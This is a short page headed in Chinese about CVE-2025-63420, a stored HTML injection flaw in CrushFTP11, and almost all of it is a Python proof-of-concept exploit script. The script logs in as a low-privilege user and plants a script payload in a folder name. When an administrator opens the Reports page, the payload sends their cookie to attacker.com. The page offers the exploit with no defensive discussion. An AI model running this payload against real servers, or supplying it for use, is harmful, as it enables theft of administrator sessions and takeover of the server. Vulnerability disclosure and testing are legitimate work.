CVE-2025-63420 CrushFTP11 存储型HTML注入漏洞

#!/usr/bin/env python3 # CVE-2025-63420 PoC - CrushFTP11 Stored HTML Injection # Target: CrushFTP11 < 11.3.7_57 # Module: Admin Panel -> Reports -> "Who Created Folder" import requests import json target = "http://target-crushftp-server:8080" username = "low_priv_user" password = "user_password" session = requests.Session() # Step 1: Login to CrushFTP login_url = f"{target}/WebInterface/login.html" login_data = { "username": username, "password": password } response = session.post(login_url, data=login_data) # Step 2: Navigate to Reports -> Who Created Folder reports_url = f"{target}/WebInterface/function/?command=getWhoCreatedFolder" # Step 3: Inject malicious HTML/JavaScript payload malicious_payload = "<script>document.location='https://attacker.com/steal?cookie='+document.cookie</script>" injection_data = { "folder_path": "/path/to/target/folder", "folder_name": f"test{malicious_payload}", "command": "create" } response = session.post(reports_url, data=injection_data) # Step 4: When admin views the report, XSS executes print("Payload injected. Waiting for admin to access Reports page...") print(f"PoC URL: {target}/WebInterface/reports.html")